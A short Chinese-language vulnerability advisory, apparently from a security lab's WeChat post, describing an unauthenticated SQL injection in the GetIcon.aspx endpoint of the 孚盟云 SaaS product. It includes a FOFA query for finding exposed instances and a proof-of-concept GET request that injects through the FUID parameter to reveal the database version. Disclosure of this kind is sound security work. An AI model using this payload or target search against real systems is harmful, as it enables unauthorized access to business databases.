孚盟云 Getlcon.aspx 接口存在SQL 注入漏洞
原文链接: https://mp.weixin.qq.com/s?__biz=Mzk5MDYxODcwMA==&mid=2247483898&idx=1&sn=479ca01aab6c21e9d19081497f01a809
孚盟云 Getlcon.aspx 接口存在SQL 注入漏洞
原创 zz 星络安全实验室 2025-07-13 14:49
|
漏洞详情:
上海孚盟软件有限公司是一家专注于外贸SaaS服务及行业解决方案的公司。其核心产品孚盟云的GetIcon.aspx接口存在SQL注入漏洞。攻击者无需身份验证即可通过精心构造的恶意请求参数注入SQL语句,可能造成数据库敏感信息泄露、数据被篡改,甚至系统权限被提升,从而严重威胁系统的数据安全性和完整性。
漏洞复现:
fofa:
app="孚盟软件-孚盟云"
poc:
受用户控制参数FUID没有进行过滤可以直接拼接成sql语句执行,利用报错注入查询数据库版本
GET /Common/GetIcon.aspx?FUID=-1'and+1=@@VERSION-- HTTP/1.1
修复意见:
关注厂商动态,升级至安全版本